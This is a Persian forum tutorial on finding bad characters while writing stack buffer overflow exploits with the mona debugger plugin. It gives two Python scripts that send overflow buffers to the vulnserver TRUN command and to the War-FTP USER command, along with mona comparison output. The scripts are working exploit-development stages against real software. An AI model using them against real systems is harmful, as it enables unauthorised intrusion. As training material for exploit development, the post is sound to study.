امتیاز موضوع:
  • 1 رأی - میانگین امتیازات: 5
  • 1
  • 2
  • 3
  • 4
  • 5
نقش کاراکترهای مخرب در پردازش اکسپلویت و نحوه یافت آنها
نویسنده پیام
godvb غایب
مدیر بازنشسته بخش نفوذ و امنیت
*****

ارسال‌ها: 430
موضوع‌ها: 77
تاریخ عضویت: اسفند ۱۳۸۶

تشکرها : 886
( 1338 تشکر در 343 ارسال )
ارسال: #1
نقش کاراکترهای مخرب در پردازش اکسپلویت و نحوه یافت آنها
اگر کمی با اکسپلویت نویسی و نحوه اکسپلویت کردن برنامه آشنایی داشته باشید بدون شک با مفهوم Bad Char آشنا هستید. Bad Char در اکسپلویت کاراکترهایی را می گویند که از وارد شدن کامل اکسپلویت به درون حافظه جلوگیری می کنند. بعنوان مثال در ورودی برنامه های C/C++ اگر دربین رشته ورودی 0×00 وجود داشته باشد به عنوان انتهای ورودی محسوب می شود و بعد از کاراکتر 0×00 نادیده گرفته می شود، بنابراین Bad Char ها یکی از ضروریات است که بایستی متناسب با هدف، آنها را بدانیم.

سوال : چگونه متناسب با هدف Bad Char ها را بدست آوریم؟؟

جواب : بایستی تمامی کاراکتر های که ممکن است بعنوان Bad Char محسوب گردند را لیست نموده تا بتوانیم توسط سعی و خطا تک،تک آنهارا بدست آوریم. این لیست در واقع از 0×00 تا 0xFF می باشد.

لیست ایجاد شده را بایستی در اکسپلویت مان بعد از Return Address قرار می دهیم بدین دلیل که Bad Char از بازنویسی Return Address جلوگیری نکند تا بتوانیم درون حافظه چک کنیم که لیست مان تا چه مکانی کپی شده اند و Bad Char چه بوده که باعث جلوگیری از کپی کامل اکسپلویت درون حافظه شده است.

در این مقاله برروی vulnserver که توسط Stephen Bradshaw نوشته شده و یک برنامه آسیب پذیر جهت تست و مثال آموزشی مورد استفاده قرار می گیرد، تست خود را انجام می دهیم.

بعد از اضافه نمودن لیست Bad Char به کدهایمان و ارسال آن به پورت vulnserver اولین راهکار این خواهد بود که بصورت دستی حافظه را چک کنیم تا کاراکتر را بدست آوریم ولی اینکار کمی زمانبر و کسل کننده است. راهکار بعدی استفاده از mona خواهد بود که بهتر از حالت قبل است، پس روند کارمان با استفاده از ابزار mona خواهد بود.



ابتدا توسط mona لیست کاراکترها را ایجاد می کنیم:
کد:
!mona bytearray

[تصویر:  image1.png]

با اجرا این کامند دو فایل در working folder ایجاد می شود:

  1. فایل متنی (txt) شامل کدهای، لیست ایجاد شده است که در سورس مان اضافه نماییم.
  2. فایل باینری (bin) این فایل در ادامه جهت چک نمودن حافظه مورد استفاده قرار می گیرد.

حال با استفاده از فایل متنی ایجاد شده سورس برنامه خود را تغییر می دهیم و بدین صورت خواهد شد:
کد:
#!/usr/bin/env python
#
# @author : AHA at 4xmen.ir
#        HamiD.Rezaei
#
import socket,sys,struct

host = '127.0.0.1'
port = 9999
vuln_cmd ='TRUN .'
vuln_buff_size= 2006
NOP = "\x90"

def main():
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((host,port))
    except:
        print "[-] Connection to "+host+" failed!"
        sys.exit(0)
    print "[*] Connected ..."    
    print "[+] Create exploit with bad char ..."
    bad_char=("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d"
            ... Snip ...
"\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
    buff=vuln_cmd
    buff+= 'A'* vuln_buff_size
    buff+= 'BBBB'
    buff+= bad_char
    print "[*] Sending Exploit ..."
    s.send(buff)

if __name__ == '__main__':
    main()

بعد از ارسال کدها به سرور با استفاده از کامند زیر عمل مقایسه را انجام می دهیم که خروجی مانند تصویر خواهد بود:

کد:
!mona compare -f C:\logs\vulnserver\bytearray.bin -a 00C5FA0C

در خروجی بخش Bad Char خالی خواهد بود ولی به status نیز دقت کنید، حال بایستی حافظه را خودمان چک کنیم و می فهمیم که اولین Bad Char نیز 0×00 خواهد بود و به دلیل وضیعت حافظه نتوانسته تشخیص بدهد:

[تصویر:  image21.png]

اولین Bad Char را بصورت دستی پیدا نمودیم حال بایستی لیست جدیدی ایجاد نماییم که این کاراکتر در آن نباشد و دوباره تست را انجام دهیم. با استفاده از کامند زیر می توانیم لیستی بدون کاراکترهای مشخص شده ایجاد نماییم:

کد:
!mona bytearray -cpb “\x00″

مراحل قبل را با لیست جدید ادامه می دهیم، می بینیم که خروجی کاراکتری را مشخص ننموده است و همچنین لیست کاراکترها بطورکامل درون حافظه وارد شده اند، بنابراین تنها Bad Char برای این تارگت 0×00 خواهد بود.
[تصویر:  image31.png]

بعنوان مثال دیگر war ftp را مورد بررسی قرار می دهیم. سورس برنامه مان بدین صورت خواهد بود:

کد:
#!/usr/bin/env python
#
# @author : AHA at 4xmen.ir
#        HamiD.Rezaei
#
import socket,sys,struct

host = '192.168.93.131'
port = 21
vuln_cmd ='USER '
vuln_buff_size= 485
end_cmd='\r\n'
NOP = "\x90"

def main():
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((host,port))
    except:
        print "[-] Connection to "+host+" failed!"
        sys.exit(0)
    s.recv(1024)
    print "[*] Connected ..."    
    print "[+] Create exploit with bad char ..."
    bad_char=("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d"
            ... Snip ...
"\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
    buff=vuln_cmd
    buff+= 'A'* vuln_buff_size
    buff+= 'BBBB'
    buff+= bad_char
    buff+= end_cmd
    print "[*] Sending exploit ..."
    s.send(buff)

if __name__ == '__main__':
    main()

حال برنامه را اجرا نموده و با استفاده از دستور زیر حافظه را با فایل باینری مقایسه می کنیم:

کد:
!mona compare -f C:\logs\war-ftpd\bytearray.bin -a 00B2FD44

خروجی مانند تصویر زیر خواهد بود که اولین کاراکتر 0×00 که پیدا نموده است:

[تصویر:  image4.png]

لیست جدید بدون 0×00 ایجاد نموده و دوباره تست را انجام میدهیم. در این مرحله کاراکتر بعدی که شناسایی می شود 0x0A می باشد.

[تصویر:  image5.png]

!Mona در مسیری که فایل باینری را ایجاد می کند، بعد از انجام عمل مقایسه نتایج کاملتر را در فایلی به نام compare.txt جهت اطلاعات بیشتر ذخیره می کند. در بخشی از این فایل ساختار مانند زیر مشاهده می شود در واقع !Mona فایل باینری و مکان حافظه که قرار است باهم مقایسه شوند را بصورت یک جدول درنظر می گیرد. در این جدول دوسطر File و Memory وجود دارد. هر بایتی که در مقایسه بین آن دو یکسان باشد در سطر Memory خالی خواهد بود، بدین صورت می توان اولین بایتی که در دوسطر یکسان نمی باشد را بعنوان Bad Char درنظر گرفت. در انتهای جدول تمامی مقایسه ها و مکان های از حافظه که یکسان بوده اند یا نبوده اند را بصورت خلاصه ذکر نموده است:

کد:
. . . Snip . . .
[+] Comparing with memory at location : 0x00b2fd44 (Stack)
Only 11 original bytes of 'normal' code found.
    ,-----------------------------------------------.
    | Comparison results:                           |
    |-----------------------------------------------|
  0 |01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10| File
    |                           20 20 63 6e 74 72 20| Memory
10 |11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20| File
    |49 6c 6c 65 67 61 6c 20 75 73 65 72 69 64 2e   | Memory
20 |21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30| File
    |4c 6f 67 69 6e 20 72 65 66 75 73 65 64    0d 0a| Memory
30 |31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40| File

            . . . Snip . . .

e0 |e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0| File
    |88 0d 18 00 00 00 00 00 a4 50 3b 00 00 00 00 00| Memory
f0 |f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff   | File
    |14 00 00 00 01 00 00 00 00 00 00 00 00 00 00   | Memory
    `-----------------------------------------------'

              | File      | Memory    | Note      
---------------------------------------------------
0  0  9   9   | 01 ... 09 | 01 ... 09 | unmodified!
---------------------------------------------------
9  9  22  22  | 0a ... 1f | 20 ... 2e | corrupted  
31 31 1   1   | 20        | 20        | unmodified!
32 32 13  13  | 21 ... 2d | 4c ... 64 | corrupted  
45 45 1   1   | 2e        | 2e        | unmodified!
46 46 209 209 | 2f ... ff | 0d ... 00 | corrupted  

Possibly bad chars: 0a
Bytes omitted from input: 00
. . . Snip . . .

در مرحله بعد 0x0D شناسایی می شود و با تکرار دوباره این مراحل به صورت زیر خروجی بدست می آید، در واقع Bad Char در این تارگت چهار کاراکتر است.

[تصویر:  image6.png]

حال این چهار کاراکتر را از لیست حذف می کنیم:

کد:
!mona bytearray -cpb “\x00\x0a\x0d\x40″

بعد از اینکه این چهار کاراکتر را از لیست حذف نمودیم دیگر مشکلی نیست و لیست کاراکتر ها بدرستی درون حافظه وارد می شود.
[تصویر:  image71.png]

حال اگر نیاز باشد تا بصورت مجموعه ای از کاراکتر را حذف کنید بدین صورت عمل می کنیم:
کد:
!mona bytearray -cpb “\x30..\x39″

استفاده از کامند بالا باعث حذف کاراکتر های عددی از لیست خواهد شد. کامند زیر کمی این قواعد را پیچیده تر استفاده نموده است:


کد:
!mona bytearray -cpb “\x00..\x40\x5B..\x60\x7B..\xFF”

کامند بالا لیستی را ایجاد می کند که حروف انگلیسی بزرگ و کوچک را شامل می شود.

آنچه توانسته ایم انجام دهیم، لطف پرودگار بوده است.

XMen For Ever
۰۴-تير-۱۳۹۳, ۱۵:۵۵:۱۰
ارسال‌ها
پاسخ
تشکر شده توسط : lord_viper, grimm, babyy, Di Di, megatron, nImaarek


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  درخواست پلن کشف باگ و اکسپلویت mirage0411 1 1,024 ۰۴-فروردین-۱۳۹۸, ۰۱:۳۱:۴۳
آخرین ارسال: NO DONGLE
  آموزش Buffer OverFlow و اکسپلویت نویسی godvb 1 5,356 ۱۰-اسفند-۱۳۸۸, ۱۸:۱۸:۳۳
آخرین ارسال: godvb
Rolleyes مشگلی در کامپایل یک اکسپلویت mehran_WOWHacker 3 3,164 ۰۹-خرداد-۱۳۸۷, ۲۱:۵۰:۵۰
آخرین ارسال: mehran_WOWHacker
  نحوه پيدا كردن smtp shagerde-shoma 2 9,853 ۱۳-فروردین-۱۳۸۷, ۱۹:۲۶:۲۶
آخرین ارسال: Mamad2003
  نحوه تنظيم اين كي لاگر......... shagerde-shoma 0 3,043 ۱۲-فروردین-۱۳۸۷, ۱۶:۰۷:۰۴
آخرین ارسال: shagerde-shoma
  فيلم آموزشي در باره انواع اكسپلويتها و نحوه شناسايي اونها d3pr2 1 2,329 ۰۶-مرداد-۱۳۸۶, ۱۳:۴۸:۱۱
آخرین ارسال: d3pr2
  آرشیو کامل اکسپلویت های سایت های معروف kasrakhan 1 3,276 ۰۷-شهریور-۱۳۸۵, ۱۱:۳۳:۵۶
آخرین ارسال: lucifer67
  15 اکسپلویت برای هك كردن phpBB Eblis-248 1 3,928 ۳۰-مرداد-۱۳۸۵, ۰۲:۴۵:۴۰
آخرین ارسال: one hacker alone

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS